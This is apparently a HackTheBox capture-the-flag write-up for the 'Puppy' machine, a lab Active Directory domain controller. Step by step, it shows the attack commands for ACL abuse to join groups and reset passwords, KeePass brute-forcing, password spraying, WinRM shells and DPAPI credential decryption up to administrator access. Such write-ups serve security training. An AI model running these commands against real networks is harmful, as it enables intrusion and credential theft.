HackTheBox: Puppy
1. Reconnaissance & Enumeration
Provided Initial Credentials: levi.james / [REDACTED]
We began with a comprehensive TCP port scan against the target.
nmap -T4 -p- -v -A -oX puppy_tcp.scan 10.129.83.249 -Pn
Key Findings:
- Port 53/tcp: DNS
- Port 88/tcp: Kerberos
- Port 139, 445/tcp: SMB
- Port 389, 636, 3268, 3269/tcp: LDAP
- Port 5985/tcp: WinRM
The target is an Active Directory Domain Controller named DC, serving the PUPPY.HTB domain. We updated our /etc/hosts file to resolve dc.puppy.htb.
SMB Share Enumeration
Using smbclient, we authenticated and listed available shares.
smbclient -L //dc.puppy.htb -U 'levi.james%[REDACTED]'
Shares Discovered:
ADMIN$,C$,IPC$,NETLOGON,SYSVOL(Standard DC shares)DEV(Custom share forPUPPY-DEVS)
Attempting to access the DEV share resulted in NT_STATUS_ACCESS_DENIED.
2. Active Directory Reconnaissance (BloodHound)
We extracted Active Directory data using bloodhound-python for offline analysis.
bloodhound-python -d PUPPY.HTB -u levi.james -p "[REDACTED]" -gc dc.puppy.htb -c all -ns 10.129.186.93
Importing the generated JSON files into the BloodHound GUI revealed critical Access Control List (ACL) relationships:
- The user
levi.jamesis a member of thehrgroup. - The
hrgroup holdsGenericWriteprivileges over theDevelopersgroup.
Tip:
GenericWriteallows a principal to update attributes of a target object. In the context of a group, it permits modifying group membership.
3. ACL Abuse & File Extraction
We leveraged the GenericWrite privilege to add levi.james to the Developers group via RPC.
net rpc group addmem "Developers" "levi.james" -U "PUPPY.HTB"/"levi.james"%"[REDACTED]" -S "DC.PUPPY.HTB"
Verifying the membership:
net rpc group members "Developers" -U "PUPPY.HTB"/"levi.james"%"[REDACTED]" -S "DC.PUPPY.HTB"
With levi.james now a member of Developers, we successfully accessed the restricted DEV share.
smbclient //puppy.htb/DEV -U 'levi.james%[REDACTED]'
smb: \> get recovery.kdbx
4. KeePass Cracking & Lateral Movement
The extracted file, recovery.kdbx, is an encrypted KeePass database. We cracked its master password using a dictionary attack.
./keepass4brute.sh ~/recovery.kdbx /usr/share/wordlists/rockyou.txt
Result: Password cracked: [REDACTED].
Opening the database in KeePassXC revealed several sets of credentials. We compiled these into user.txt and passwords.txt and sprayed them across SMB using crackmapexec (or nxc).
crackmapexec smb 10.10.11.70 -u user.txt -p passwords.txt --continue-on-success
This validated credentials for the user ant.edwards ([REDACTED]).
Second ACL Abuse
Reviewing BloodHound data, ant.edwards holds GenericAll over the user adam.silver, granting full control, including the ability to reset passwords.
net rpc password "adam.silver" "[REDACTED]" -U "PUPPY.HTB"/"ant.edwards"%"[REDACTED]" -S "DC.PUPPY.HTB"
However, WinRM access for adam.silver failed because the account was disabled. Since GenericAll encompasses modifying UserAccountControl (UAC) flags, we enabled the account using bloodyAD.
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p '[REDACTED]' remove uac adam.silver -f ACCOUNTDISABLE
We subsequently authenticated via WinRM:
evil-winrm -i 10.10.11.70 -u adam.silver -p '[REDACTED]'
Result: Gained shell as adam.silver. User flag secured.
5. Privilege Escalation (DPAPI)
Further enumeration and password spraying yielded valid credentials for steph.cooper ([REDACTED]). Connecting via WinRM, we investigated the user's DPAPI (Data Protection API) artifacts.
DPAPI protects sensitive data (e.g., credentials) using a Master Key derived from the user's password. The Master Key is stored in %APPDATA%\Microsoft\Protect.
Extracting the Master Key File:
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"))
We decoded the Base64 payload locally and saved it as master.key. We then used dpapi.py (from Impacket) to decrypt the Master Key using steph.cooper's SID and known password.
dpapi.py masterkey -file ~/master.key -sid S-1-5-21-1487982659-1829050783-2281216199-1107
# Provided password: [REDACTED]
# Output: Decrypted key: 0xd9a57072...
Decrypting the Credentials:
We then extracted a protected credential blob from C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\ and decrypted it using the recovered Master Key.
dpapi.py credential -file ~/C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a57072...
Result: Decrypted credentials for steph.cooper_adm (Password: [REDACTED]).
Authenticating as steph.cooper_adm via WinRM granted Administrative access.
evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p '[REDACTED]'
Result: SYSTEM shell obtained. The root flag is located at C:\Users\Administrator\Desktop\root.txt ([REDACTED]).